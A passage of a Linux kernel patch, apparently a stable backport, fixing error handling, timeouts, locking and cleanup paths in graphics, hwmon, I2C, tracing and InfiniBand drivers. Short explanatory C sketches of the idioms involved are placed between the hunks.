+ 
+ #define PCH_LVDS	_MMIO(0xe1180)
+-#define  LVDS_DETECTED	(1 << 1)
++#define   LVDS_DETECTED	REG_BIT(1)
+ 
+ #define _PCH_DP_B		0xe4100
+ #define PCH_DP_B		_MMIO(_PCH_DP_B)
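
The i915_reg.h hunk above replaces open-coded shift/mask pairs with the
driver's REG_BIT/REG_GENMASK/REG_FIELD_PREP macros, so each field is described
once by its mask and the shift is derived from it. A compilable userspace
approximation of those semantics (the real macros live in the kernel's
include/linux/bits.h and i915's register headers, and add compile-time
checking this sketch omits):

#include <stdint.h>
#include <stdio.h>

#define BIT(n)		(1u << (n))
#define GENMASK(h, l)	((~0u >> (31 - (h))) & (~0u << (l)))
/* derive the shift from the mask, so a field is declared exactly once */
#define FIELD_PREP(mask, val)	(((val) << __builtin_ctz(mask)) & (mask))
#define FIELD_GET(mask, reg)	(((reg) & (mask)) >> __builtin_ctz(mask))

#define LVDS_PORT_EN		BIT(31)
#define LVDS_PIPE_SEL_MASK_CPT	GENMASK(30, 29)

int main(void)
{
	uint32_t val = LVDS_PORT_EN | FIELD_PREP(LVDS_PIPE_SEL_MASK_CPT, 2);

	/* mirrors the REG_FIELD_GET(LVDS_PIPE_SEL_MASK, val) read earlier */
	printf("enabled=%d pipe=%u\n", !!(val & LVDS_PORT_EN),
	       FIELD_GET(LVDS_PIPE_SEL_MASK_CPT, val));
	return 0;
}
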
+diff --git a/drivers/hwmon/acpi_power_meter.c b/drivers/hwmon/acpi_power_meter.c
+index 0962c12eba5a0..2147afb725581 100644
+--- a/drivers/hwmon/acpi_power_meter.c
++++ b/drivers/hwmon/acpi_power_meter.c
+@@ -31,6 +31,7 @@
+ #define POWER_METER_CAN_NOTIFY	(1 << 3)
+ #define POWER_METER_IS_BATTERY	(1 << 8)
+ #define UNKNOWN_HYSTERESIS	0xFFFFFFFF
++#define UNKNOWN_POWER		0xFFFFFFFF
+ 
+ #define METER_NOTIFY_CONFIG	0x80
+ #define METER_NOTIFY_TRIP	0x81
+@@ -348,6 +349,9 @@ static ssize_t show_power(struct device *dev,
+ 	update_meter(resource);
+ 	mutex_unlock(&resource->lock);
+ 
++	if (resource->power == UNKNOWN_POWER)
++		return -ENODATA;
++
+ 	return sprintf(buf, "%llu\n", resource->power * 1000);
+ }
+ 
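
The acpi_power_meter hunk stops multiplying the firmware's all-ones sentinel
into a bogus power reading and returns -ENODATA instead. A small sketch of the
sentinel-check pattern (show_power_uw() is a hypothetical stand-in for the
sysfs show routine):

#include <errno.h>
#include <stdint.h>
#include <stdio.h>

#define UNKNOWN_POWER	0xFFFFFFFF

static int show_power_uw(uint32_t raw_mw, unsigned long long *out_uw)
{
	if (raw_mw == UNKNOWN_POWER)
		return -ENODATA;	/* firmware has no valid sample */

	*out_uw = (unsigned long long)raw_mw * 1000;	/* mW -> uW */
	return 0;
}

int main(void)
{
	unsigned long long uw;

	if (show_power_uw(UNKNOWN_POWER, &uw) == -ENODATA)
		puts("no data");
	if (!show_power_uw(42, &uw))
		printf("%llu\n", uw);
	return 0;
}
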
+diff --git a/drivers/hwmon/nzxt-kraken2.c b/drivers/hwmon/nzxt-kraken2.c
+index 89f7ea4f42d47..badbcaf01f90b 100644
+--- a/drivers/hwmon/nzxt-kraken2.c
++++ b/drivers/hwmon/nzxt-kraken2.c
+@@ -161,13 +161,13 @@ static int kraken2_probe(struct hid_device *hdev,
+ 	ret = hid_hw_start(hdev, HID_CONNECT_HIDRAW);
+ 	if (ret) {
+ 		hid_err(hdev, "hid hw start failed with %d\n", ret);
+-		goto fail_and_stop;
++		return ret;
+ 	}
+ 
+ 	ret = hid_hw_open(hdev);
+ 	if (ret) {
+ 		hid_err(hdev, "hid hw open failed with %d\n", ret);
+-		goto fail_and_close;
++		goto fail_and_stop;
+ 	}
+ 
+ 	priv->hwmon_dev = hwmon_device_register_with_info(&hdev->dev, "kraken2",
+diff --git a/drivers/hwtracing/coresight/coresight-etm4x-core.c b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+index 1cf7478da6ee8..fda48a0afc1a5 100644
+--- a/drivers/hwtracing/coresight/coresight-etm4x-core.c
++++ b/drivers/hwtracing/coresight/coresight-etm4x-core.c
+@@ -2072,7 +2072,7 @@ static void clear_etmdrvdata(void *info)
+ 	etmdrvdata[cpu] = NULL;
+ }
+ 
+-static int __exit etm4_remove_dev(struct etmv4_drvdata *drvdata)
++static void etm4_remove_dev(struct etmv4_drvdata *drvdata)
+ {
+ 	etm_perf_symlink(drvdata->csdev, false);
+ 	/*
+@@ -2094,10 +2094,9 @@ static int __exit etm4_remove_dev(struct etmv4_drvdata *drvdata)
+ 	cscfg_unregister_csdev(drvdata->csdev);
+ 	coresight_unregister(drvdata->csdev);
+ 
+-	return 0;
+ }
+ 
+-static void __exit etm4_remove_amba(struct amba_device *adev)
++static void etm4_remove_amba(struct amba_device *adev)
+ {
+ 	struct etmv4_drvdata *drvdata = dev_get_drvdata(&adev->dev);
+ 
+@@ -2105,15 +2104,14 @@ static void __exit etm4_remove_amba(struct amba_device *adev)
+ 		etm4_remove_dev(drvdata);
+ }
+ 
+-static int __exit etm4_remove_platform_dev(struct platform_device *pdev)
++static int etm4_remove_platform_dev(struct platform_device *pdev)
+ {
+-	int ret = 0;
+ 	struct etmv4_drvdata *drvdata = dev_get_drvdata(&pdev->dev);
+ 
+ 	if (drvdata)
+-		ret = etm4_remove_dev(drvdata);
++		etm4_remove_dev(drvdata);
+ 	pm_runtime_disable(&pdev->dev);
+-	return ret;
++	return 0;
+ }
+ 
+ static const struct amba_id etm4_ids[] = {
+diff --git a/drivers/hwtracing/ptt/hisi_ptt.c b/drivers/hwtracing/ptt/hisi_ptt.c
+index 4140efd664097..016220ba0addd 100644
+--- a/drivers/hwtracing/ptt/hisi_ptt.c
++++ b/drivers/hwtracing/ptt/hisi_ptt.c
+@@ -837,6 +837,10 @@ static void hisi_ptt_pmu_del(struct perf_event *event, int flags)
+ 	hisi_ptt_pmu_stop(event, PERF_EF_UPDATE);
+ }
+ 
++static void hisi_ptt_pmu_read(struct perf_event *event)
++{
++}
++
+ static void hisi_ptt_remove_cpuhp_instance(void *hotplug_node)
+ {
+ 	cpuhp_state_remove_instance_nocalls(hisi_ptt_pmu_online, hotplug_node);
+@@ -880,6 +884,7 @@ static int hisi_ptt_register_pmu(struct hisi_ptt *hisi_ptt)
+ 		.stop		= hisi_ptt_pmu_stop,
+ 		.add		= hisi_ptt_pmu_add,
+ 		.del		= hisi_ptt_pmu_del,
++		.read		= hisi_ptt_pmu_read,
+ 	};
+ 
+ 	reg = readl(hisi_ptt->iobase + HISI_PTT_LOCATION);
+diff --git a/drivers/i2c/busses/i2c-designware-common.c b/drivers/i2c/busses/i2c-designware-common.c
+index 6fdb25a5f8016..ad98c85ec2e7a 100644
+--- a/drivers/i2c/busses/i2c-designware-common.c
++++ b/drivers/i2c/busses/i2c-designware-common.c
+@@ -63,7 +63,7 @@ static int dw_reg_read(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = readl_relaxed(dev->base + reg);
++	*val = readl(dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -72,7 +72,7 @@ static int dw_reg_write(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writel_relaxed(val, dev->base + reg);
++	writel(val, dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -81,7 +81,7 @@ static int dw_reg_read_swab(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = swab32(readl_relaxed(dev->base + reg));
++	*val = swab32(readl(dev->base + reg));
+ 
+ 	return 0;
+ }
+@@ -90,7 +90,7 @@ static int dw_reg_write_swab(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writel_relaxed(swab32(val), dev->base + reg);
++	writel(swab32(val), dev->base + reg);
+ 
+ 	return 0;
+ }
+@@ -99,8 +99,8 @@ static int dw_reg_read_word(void *context, unsigned int reg, unsigned int *val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	*val = readw_relaxed(dev->base + reg) |
+-		(readw_relaxed(dev->base + reg + 2) << 16);
++	*val = readw(dev->base + reg) |
++		(readw(dev->base + reg + 2) << 16);
+ 
+ 	return 0;
+ }
+@@ -109,8 +109,8 @@ static int dw_reg_write_word(void *context, unsigned int reg, unsigned int val)
+ {
+ 	struct dw_i2c_dev *dev = context;
+ 
+-	writew_relaxed(val, dev->base + reg);
+-	writew_relaxed(val >> 16, dev->base + reg + 2);
++	writew(val, dev->base + reg);
++	writew(val >> 16, dev->base + reg + 2);
+ 
+ 	return 0;
+ }
+diff --git a/drivers/infiniband/core/umem.c b/drivers/infiniband/core/umem.c
+index 957634eceba8f..8ce569bf7525e 100644
+--- a/drivers/infiniband/core/umem.c
++++ b/drivers/infiniband/core/umem.c
+@@ -96,12 +96,6 @@ unsigned long ib_umem_find_best_pgsz(struct ib_umem *umem,
+ 		return page_size;
+ 	}
+ 
+-	/* rdma_for_each_block() has a bug if the page size is smaller than the
+-	 * page size used to build the umem. For now prevent smaller page sizes
+-	 * from being returned.
+-	 */
+-	pgsz_bitmap &= GENMASK(BITS_PER_LONG - 1, PAGE_SHIFT);
+-
+ 	/* The best result is the smallest page size that results in the minimum
+ 	 * number of required pages. Compute the largest page size that could
+ 	 * work based on VA address bits that don't change.
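
For context on the ib_umem hunk: pgsz_bitmap encodes candidate page sizes as
set bits, and the removed lines were a workaround that masked out every
candidate below PAGE_SIZE. A simplified, hypothetical illustration of picking
a size from such a bitmap (not the real ib_umem_find_best_pgsz() logic, which
also folds in VA/IOVA alignment):

#include <stdint.h>
#include <stdio.h>

/* Largest candidate (set bit) that divides both the start and the length. */
static unsigned long best_pgsz(unsigned long bitmap, uint64_t va, uint64_t len)
{
	while (bitmap) {
		unsigned long pgsz =
			1ul << (8 * sizeof(bitmap) - 1 - __builtin_clzl(bitmap));

		if (!(va & (pgsz - 1)) && !(len & (pgsz - 1)))
			return pgsz;
		bitmap &= ~pgsz;	/* try the next smaller candidate */
	}
	return 0;
}

int main(void)
{
	/* candidates: 4K, 64K, 2M */
	unsigned long bm = (1ul << 12) | (1ul << 16) | (1ul << 21);

	printf("%lu\n", best_pgsz(bm, 0x200000, 0x400000));	/* 2097152 */
	printf("%lu\n", best_pgsz(bm, 0x201000, 0x3ff000));	/* 4096 */
	return 0;
}
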
+diff --git a/drivers/infiniband/hw/bnxt_re/main.c b/drivers/infiniband/hw/bnxt_re/main.c
+index e58893387bb4d..43d396a7d8e16 100644
+--- a/drivers/infiniband/hw/bnxt_re/main.c
++++ b/drivers/infiniband/hw/bnxt_re/main.c
+@@ -70,7 +70,7 @@ static char version[] =
+ 		BNXT_RE_DESC "\n";
+ 
+ MODULE_AUTHOR("Eddie Wai <eddie.wai@broadcom.com>");
+-MODULE_DESCRIPTION(BNXT_RE_DESC " Driver");
++MODULE_DESCRIPTION(BNXT_RE_DESC);
+ MODULE_LICENSE("Dual BSD/GPL");
+ 
+ /* globals */
+diff --git a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+index 8a9d28f81149a..c2ee80546d120 100644
+--- a/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
++++ b/drivers/infiniband/hw/hns/hns_roce_hw_v2.c
+@@ -4913,10 +4913,15 @@ static int check_cong_type(struct ib_qp *ibqp,
+ 		cong_alg->wnd_mode_sel = WND_LIMIT;
+ 		break;
+ 	default:
+-		ibdev_err(&hr_dev->ib_dev,
+-			  "error type(%u) for congestion selection.\n",
+-			  hr_dev->caps.cong_type);
+-		return -EINVAL;
++		ibdev_warn(&hr_dev->ib_dev,
++			   "invalid type(%u) for congestion selection.\n",
++			   hr_dev->caps.cong_type);
++		hr_dev->caps.cong_type = CONG_TYPE_DCQCN;
++		cong_alg->alg_sel = CONG_DCQCN;
++		cong_alg->alg_sub_sel = UNSUPPORT_CONG_LEVEL;
++		cong_alg->dip_vld = DIP_INVALID;
++		cong_alg->wnd_mode_sel = WND_LIMIT;
++		break;
+ 	}
+ 
+ 	return 0;
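
The hns_roce hunk above demotes an unknown congestion-control type from a hard
-EINVAL failure to a warning plus a fall-back to the DCQCN defaults. The
warn-and-default shape in miniature (names trimmed from the hunk, values
illustrative):

#include <stdio.h>

enum cong_type { CONG_TYPE_DCQCN, CONG_TYPE_LDCP, CONG_TYPE_HC3 };

static enum cong_type check_cong_type(int requested)
{
	switch (requested) {
	case CONG_TYPE_DCQCN:
	case CONG_TYPE_LDCP:
	case CONG_TYPE_HC3:
		return (enum cong_type)requested;
	default:
		fprintf(stderr, "invalid type(%d), falling back to DCQCN\n",
			requested);
		return CONG_TYPE_DCQCN;	/* keep the QP usable */
	}
}

int main(void)
{
	printf("%d\n", check_cong_type(42));	/* warns, returns 0 (DCQCN) */
	return 0;
}
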
+diff --git a/drivers/infiniband/hw/irdma/hw.c b/drivers/infiniband/hw/irdma/hw.c
+index c07ce85d243f1..311a1138e838d 100644
+--- a/drivers/infiniband/hw/irdma/hw.c
++++ b/drivers/infiniband/hw/irdma/hw.c
+@@ -322,7 +322,11 @@ static void irdma_process_aeq(struct irdma_pci_f *rf)
+ 			break;
+ 		case IRDMA_AE_QP_SUSPEND_COMPLETE:
+ 			if (iwqp->iwdev->vsi.tc_change_pending) {
+-				atomic_dec(&iwqp->sc_qp.vsi->qp_suspend_reqs);
++				if (!atomic_dec_return(&qp->vsi->qp_suspend_reqs))
++					wake_up(&iwqp->iwdev->suspend_wq);
++			}
++			if (iwqp->suspend_pending) {
++				iwqp->suspend_pending = false;
+ 				wake_up(&iwqp->iwdev->suspend_wq);
+ 			}
+ 			break;
+@@ -568,16 +572,13 @@ static void irdma_destroy_irq(struct irdma_pci_f *rf,
+  * Issue destroy cqp request and
+  * free the resources associated with the cqp
+  */
+-static void irdma_destroy_cqp(struct irdma_pci_f *rf, bool free_hwcqp)
++static void irdma_destroy_cqp(struct irdma_pci_f *rf)
+ {
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+ 	struct irdma_cqp *cqp = &rf->cqp;
+ 	int status = 0;
+ 
+-	if (rf->cqp_cmpl_wq)
+-		destroy_workqueue(rf->cqp_cmpl_wq);
+-	if (free_hwcqp)
+-		status = irdma_sc_cqp_destroy(dev->cqp);
++	status = irdma_sc_cqp_destroy(dev->cqp);
+ 	if (status)
+ 		ibdev_dbg(to_ibdev(dev), "ERR: Destroy CQP failed %d\n", status);
+ 
+@@ -741,6 +742,9 @@ static void irdma_destroy_ccq(struct irdma_pci_f *rf)
+ 	struct irdma_ccq *ccq = &rf->ccq;
+ 	int status = 0;
+ 
++	if (rf->cqp_cmpl_wq)
++		destroy_workqueue(rf->cqp_cmpl_wq);
++
+ 	if (!rf->reset)
+ 		status = irdma_sc_ccq_destroy(dev->ccq, 0, true);
+ 	if (status)
+@@ -921,8 +925,8 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 
+ 	cqp->scratch_array = kcalloc(sqsize, sizeof(*cqp->scratch_array), GFP_KERNEL);
+ 	if (!cqp->scratch_array) {
+-		kfree(cqp->cqp_requests);
+-		return -ENOMEM;
++		status = -ENOMEM;
++		goto err_scratch;
+ 	}
+ 
+ 	dev->cqp = &cqp->sc_cqp;
+@@ -932,15 +936,14 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	cqp->sq.va = dma_alloc_coherent(dev->hw->device, cqp->sq.size,
+ 					&cqp->sq.pa, GFP_KERNEL);
+ 	if (!cqp->sq.va) {
+-		kfree(cqp->scratch_array);
+-		kfree(cqp->cqp_requests);
+-		return -ENOMEM;
++		status = -ENOMEM;
++		goto err_sq;
+ 	}
+ 
+ 	status = irdma_obj_aligned_mem(rf, &mem, sizeof(struct irdma_cqp_ctx),
+ 				       IRDMA_HOST_CTX_ALIGNMENT_M);
+ 	if (status)
+-		goto exit;
++		goto err_ctx;
+ 
+ 	dev->cqp->host_ctx_pa = mem.pa;
+ 	dev->cqp->host_ctx = mem.va;
+@@ -966,7 +969,7 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	status = irdma_sc_cqp_init(dev->cqp, &cqp_init_info);
+ 	if (status) {
+ 		ibdev_dbg(to_ibdev(dev), "ERR: cqp init status %d\n", status);
+-		goto exit;
++		goto err_ctx;
+ 	}
+ 
+ 	spin_lock_init(&cqp->req_lock);
+@@ -977,7 +980,7 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 		ibdev_dbg(to_ibdev(dev),
+ 			  "ERR: cqp create failed - status %d maj_err %d min_err %d\n",
+ 			  status, maj_err, min_err);
+-		goto exit;
++		goto err_ctx;
+ 	}
+ 
+ 	INIT_LIST_HEAD(&cqp->cqp_avail_reqs);
+@@ -991,8 +994,16 @@ static int irdma_create_cqp(struct irdma_pci_f *rf)
+ 	init_waitqueue_head(&cqp->remove_wq);
+ 	return 0;
+ 
+-exit:
+-	irdma_destroy_cqp(rf, false);
++err_ctx:
++	dma_free_coherent(dev->hw->device, cqp->sq.size,
++			  cqp->sq.va, cqp->sq.pa);
++	cqp->sq.va = NULL;
++err_sq:
++	kfree(cqp->scratch_array);
++	cqp->scratch_array = NULL;
++err_scratch:
++	kfree(cqp->cqp_requests);
++	cqp->cqp_requests = NULL;
+ 
+ 	return status;
+ }
+@@ -1159,7 +1170,6 @@ static int irdma_create_ceq(struct irdma_pci_f *rf, struct irdma_ceq *iwceq,
+ 	int status;
+ 	struct irdma_ceq_init_info info = {};
+ 	struct irdma_sc_dev *dev = &rf->sc_dev;
+-	u64 scratch;
+ 	u32 ceq_size;
+ 
+ 	info.ceq_id = ceq_id;
+@@ -1180,14 +1190,13 @@ static int irdma_create_ceq(struct irdma_pci_f *rf, struct irdma_ceq *iwceq,
+ 	iwceq->sc_ceq.ceq_id = ceq_id;
+ 	info.dev = dev;
+ 	info.vsi = vsi;
+-	scratch = (uintptr_t)&rf->cqp.sc_cqp;
+ 	status = irdma_sc_ceq_init(&iwceq->sc_ceq, &info);
+ 	if (!status) {
+ 		if (dev->ceq_valid)
+ 			status = irdma_cqp_ceq_cmd(&rf->sc_dev, &iwceq->sc_ceq,
+ 						   IRDMA_OP_CEQ_CREATE);
+ 		else
+-			status = irdma_sc_cceq_create(&iwceq->sc_ceq, scratch);
++			status = irdma_sc_cceq_create(&iwceq->sc_ceq, 0);
+ 	}
+ 
+ 	if (status) {
+@@ -1740,7 +1749,7 @@ void irdma_ctrl_deinit_hw(struct irdma_pci_f *rf)
+ 				      rf->reset, rf->rdma_ver);
+ 		fallthrough;
+ 	case CQP_CREATED:
+-		irdma_destroy_cqp(rf, true);
++		irdma_destroy_cqp(rf);
+ 		fallthrough;
+ 	case INITIAL_STATE:
+ 		irdma_del_init_mem(rf);
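
The irdma_create_cqp() change above is a textbook rewrite from per-site
cleanup (each failure freeing everything allocated so far by hand) to a goto
ladder, where each label undoes exactly one earlier step and falls through to
the labels before it. A self-contained sketch of the idiom with placeholder
allocations:

#include <stdlib.h>

static int create_cqp_like(void)
{
	char *requests, *scratch, *sq;

	requests = malloc(64);		/* step 1 */
	if (!requests)
		return -1;		/* nothing to unwind yet */

	scratch = malloc(64);		/* step 2 */
	if (!scratch)
		goto err_scratch;

	sq = malloc(64);		/* step 3 */
	if (!sq)
		goto err_sq;

	/* success; freed here only to keep the demo leak-free */
	free(sq);
	free(scratch);
	free(requests);
	return 0;

err_sq:				/* step 3 failed: undo step 2 ... */
	free(scratch);
err_scratch:			/* ... then step 1 */
	free(requests);
	return -1;
}

int main(void) { return create_cqp_like(); }
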
+diff --git a/drivers/infiniband/hw/irdma/main.c b/drivers/infiniband/hw/irdma/main.c
+index 514453777e07d..be1030d1adfaf 100644
+--- a/drivers/infiniband/hw/irdma/main.c
++++ b/drivers/infiniband/hw/irdma/main.c
+@@ -48,7 +48,7 @@ static void irdma_prep_tc_change(struct irdma_device *iwdev)
+ 	/* Wait for all qp's to suspend */
+ 	wait_event_timeout(iwdev->suspend_wq,
+ 			   !atomic_read(&iwdev->vsi.qp_suspend_reqs),
+-			   IRDMA_EVENT_TIMEOUT);
++			   msecs_to_jiffies(IRDMA_EVENT_TIMEOUT_MS));
+ 	irdma_ws_reset(&iwdev->vsi);
+ }
+ 
+diff --git a/drivers/infiniband/hw/irdma/main.h b/drivers/infiniband/hw/irdma/main.h
+index 9cbe64311f985..6a6b14d8fca45 100644
+--- a/drivers/infiniband/hw/irdma/main.h
++++ b/drivers/infiniband/hw/irdma/main.h
+@@ -78,7 +78,7 @@ extern struct auxiliary_driver i40iw_auxiliary_drv;
+ 
+ #define MAX_DPC_ITERATIONS	128
+ 
+-#define IRDMA_EVENT_TIMEOUT		50000
++#define IRDMA_EVENT_TIMEOUT_MS		5000
+ #define IRDMA_VCHNL_EVENT_TIMEOUT	100000
+ #define IRDMA_RST_TIMEOUT_HZ		4
+ 
+diff --git a/drivers/infiniband/hw/irdma/verbs.c b/drivers/infiniband/hw/irdma/verbs.c
+index 3b8b2341981ea..447e1bcc82a32 100644
+--- a/drivers/infiniband/hw/irdma/verbs.c
++++ b/drivers/infiniband/hw/irdma/verbs.c
+@@ -1098,6 +1098,21 @@ static int irdma_query_pkey(struct ib_device *ibdev, u32 port, u16 index,
+ 	return 0;
+ }
+ 
++static int irdma_wait_for_suspend(struct irdma_qp *iwqp)
++{
++	if (!wait_event_timeout(iwqp->iwdev->suspend_wq,
++				!iwqp->suspend_pending,
++				msecs_to_jiffies(IRDMA_EVENT_TIMEOUT_MS))) {
++		iwqp->suspend_pending = false;
++		ibdev_warn(&iwqp->iwdev->ibdev,
++			   "modify_qp timed out waiting for suspend. qp_id = %d, last_ae = 0x%x\n",
++			   iwqp->ibqp.qp_num, iwqp->last_aeq);
++		return -EBUSY;
++	}
++
++	return 0;
++}
++
+ /**
+  * irdma_modify_qp_roce - modify qp request
+  * @ibqp: qp's pointer for modify
+@@ -1359,17 +1374,11 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 
+ 			info.next_iwarp_state = IRDMA_QP_STATE_SQD;
+ 			issue_modify_qp = 1;
++			iwqp->suspend_pending = true;
+ 			break;
+ 		case IB_QPS_SQE:
+ 		case IB_QPS_ERR:
+ 		case IB_QPS_RESET:
+-			if (iwqp->iwarp_state == IRDMA_QP_STATE_RTS) {
+-				spin_unlock_irqrestore(&iwqp->lock, flags);
+-				info.next_iwarp_state = IRDMA_QP_STATE_SQD;
+-				irdma_hw_modify_qp(iwdev, iwqp, &info, true);
+-				spin_lock_irqsave(&iwqp->lock, flags);
+-			}
+-
+ 			if (iwqp->iwarp_state == IRDMA_QP_STATE_ERROR) {
+ 				spin_unlock_irqrestore(&iwqp->lock, flags);
+ 				if (udata && udata->inlen) {
+@@ -1406,6 +1415,11 @@ int irdma_modify_qp_roce(struct ib_qp *ibqp, struct ib_qp_attr *attr,
+ 			ctx_info->rem_endpoint_idx = udp_info->arp_idx;
+ 			if (irdma_hw_modify_qp(iwdev, iwqp, &info, true))
+ 				return -EINVAL;
++			if (info.next_iwarp_state == IRDMA_QP_STATE_SQD) {
++				ret = irdma_wait_for_suspend(iwqp);
++				if (ret)
++					return ret;
++			}
+ 			spin_lock_irqsave(&iwqp->lock, flags);
+ 			if (iwqp->iwarp_state == info.curr_iwarp_state) {
+ 				iwqp->iwarp_state = info.next_iwarp_state;
+diff --git a/drivers/infiniband/hw/irdma/verbs.h b/drivers/infiniband/hw/irdma/verbs.h
+index a536e9fa85ebf..9f9e273bbff3e 100644
+--- a/drivers/infiniband/hw/irdma/verbs.h
++++ b/drivers/infiniband/hw/irdma/verbs.h
+@@ -193,6 +193,7 @@ struct irdma_qp {
+ 	u8 flush_issued : 1;
+ 	u8 sig_all : 1;
+ 	u8 pau_mode : 1;
++	u8 suspend_pending : 1;
+ 	u8 rsvd : 1;
+ 	u8 iwarp_state;
+ 	u16 term_sq_flush_code;
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-clt.c b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+index a67f58359de9e..cc07c91f9c549 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-clt.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-clt.c
+@@ -382,7 +382,7 @@ static void complete_rdma_req(struct rtrs_clt_io_req *req, int errno,
+ 	struct rtrs_clt_path *clt_path;
+ 	int err;
+ 
+-	if (WARN_ON(!req->in_use))
++	if (!req->in_use)
+ 		return;
+ 	if (WARN_ON(!req->con))
+ 		return;
+@@ -1694,7 +1694,7 @@ static int create_con_cq_qp(struct rtrs_clt_con *con)
+ 		clt_path->s.dev_ref++;
+ 		max_send_wr = min_t(int, wr_limit,
+ 			      /* QD * (REQ + RSP + FR REGS or INVS) + drain */
+-			      clt_path->queue_depth * 3 + 1);
++			      clt_path->queue_depth * 4 + 1);
+ 		max_recv_wr = min_t(int, wr_limit,
+ 			      clt_path->queue_depth * 3 + 1);
+ 		max_send_sge = 2;
+@@ -2346,8 +2346,6 @@ static int init_conns(struct rtrs_clt_path *clt_path)
+ 	if (err)
+ 		goto destroy;
+ 
+-	rtrs_start_hb(&clt_path->s);
+-
+ 	return 0;
+ 
+ destroy:
+@@ -2621,6 +2619,7 @@ static int init_path(struct rtrs_clt_path *clt_path)
+ 		goto out;
+ 	}
+ 	rtrs_clt_path_up(clt_path);
++	rtrs_start_hb(&clt_path->s);
+ out:
+ 	mutex_unlock(&clt_path->init_mutex);
+ 
+diff --git a/drivers/infiniband/ulp/rtrs/rtrs-srv.c b/drivers/infiniband/ulp/rtrs/rtrs-srv.c
+index 22d7ba05e9fe8..e978ee4bb73ae 100644
+--- a/drivers/infiniband/ulp/rtrs/rtrs-srv.c
++++ b/drivers/infiniband/ulp/rtrs/rtrs-srv.c
+@@ -63,8 +63,9 @@ static bool rtrs_srv_change_state(struct rtrs_srv_path *srv_path,
+ {
+ 	enum rtrs_srv_state old_state;
+ 	bool changed = false;
++	unsigned long flags;
+ 
+-	spin_lock_irq(&srv_path->state_lock);
++	spin_lock_irqsave(&srv_path->state_lock, flags);
+ 	old_state = srv_path->state;
+ 	switch (new_state) {
+ 	case RTRS_SRV_CONNECTED:
+@@ -85,7 +86,7 @@ static bool rtrs_srv_change_state(struct rtrs_srv_path *srv_path,
+ 	}
+ 	if (changed)
+ 		srv_path->state = new_state;
+-	spin_unlock_irq(&srv_path->state_lock);
++	spin_unlock_irqrestore(&srv_path->state_lock, flags);
+ 
+ 	return changed;
+ }
+@@ -548,7 +549,10 @@ static void unmap_cont_bufs(struct rtrs_srv_path *srv_path)
+ 		struct rtrs_srv_mr *srv_mr;
+ 
+ 		srv_mr = &srv_path->mrs[i];
+-		rtrs_iu_free(srv_mr->iu, srv_path->s.dev->ib_dev, 1);
++
++		if (always_invalidate)
++			rtrs_iu_free(srv_mr->iu, srv_path->s.dev->ib_dev, 1);
++
+ 		ib_dereg_mr(srv_mr->mr);
+ 		ib_dma_unmap_sg(srv_path->s.dev->ib_dev, srv_mr->sgt.sgl,
+ 				srv_mr->sgt.nents, DMA_BIDIRECTIONAL);
+@@ -714,20 +718,23 @@ static void rtrs_srv_info_rsp_done(struct ib_cq *cq, struct ib_wc *wc)
+ 	WARN_ON(wc->opcode != IB_WC_SEND);
+ }
+ 
+-static void rtrs_srv_path_up(struct rtrs_srv_path *srv_path)
++static int rtrs_srv_path_up(struct rtrs_srv_path *srv_path)
+ {
+ 	struct rtrs_srv_sess *srv = srv_path->srv;
+ 	struct rtrs_srv_ctx *ctx = srv->ctx;
+-	int up;
++	int up, ret = 0;
+ 
+ 	mutex_lock(&srv->paths_ev_mutex);
+ 	up = ++srv->paths_up;
+ 	if (up == 1)
+-		ctx->ops.link_ev(srv, RTRS_SRV_LINK_EV_CONNECTED, NULL);
++		ret = ctx->ops.link_ev(srv, RTRS_SRV_LINK_EV_CONNECTED, NULL);
+ 	mutex_unlock(&srv->paths_ev_mutex);
+ 
+ 	/* Mark session as established */
+-	srv_path->established = true;
++	if (!ret)
++		srv_path->established = true;
++
++	return ret;
+ }
+ 
+ static void rtrs_srv_path_down(struct rtrs_srv_path *srv_path)
+@@ -856,7 +863,12 @@ static int process_info_req(struct rtrs_srv_con *con,
+ 		goto iu_free;
+ 	kobject_get(&srv_path->kobj);
+ 	get_device(&srv_path->srv->dev);
+-	rtrs_srv_change_state(srv_path, RTRS_SRV_CONNECTED);
++	err = rtrs_srv_change_state(srv_path, RTRS_SRV_CONNECTED);
++	if (!err) {
++		rtrs_err(s, "rtrs_srv_change_state(), err: %d\n", err);
++		goto iu_free;
++	}
++
+ 	rtrs_srv_start_hb(srv_path);
+ 
+ 	/*
+@@ -865,7 +877,11 @@ static int process_info_req(struct rtrs_srv_con *con,
+ 	 * all connections are successfully established.  Thus, simply notify
+ 	 * listener with a proper event if we are the first path.
+ 	 */
+-	rtrs_srv_path_up(srv_path);
++	err = rtrs_srv_path_up(srv_path);
++	if (err) {
++		rtrs_err(s, "rtrs_srv_path_up(), err: %d\n", err);
++		goto iu_free;
++	}
+ 
+ 	ib_dma_sync_single_for_device(srv_path->s.dev->ib_dev,
+ 				      tx_iu->dma_addr,
+@@ -1521,7 +1537,6 @@ static void rtrs_srv_close_work(struct work_struct *work)
+ 
+ 	srv_path = container_of(work, typeof(*srv_path), close_work);
+ 
+-	rtrs_srv_destroy_path_files(srv_path);
+ 	rtrs_srv_stop_hb(srv_path);
+ 
+ 	for (i = 0; i < srv_path->s.con_num; i++) {
+@@ -1541,6 +1556,8 @@ static void rtrs_srv_close_work(struct work_struct *work)
+ 	/* Wait for all completion */
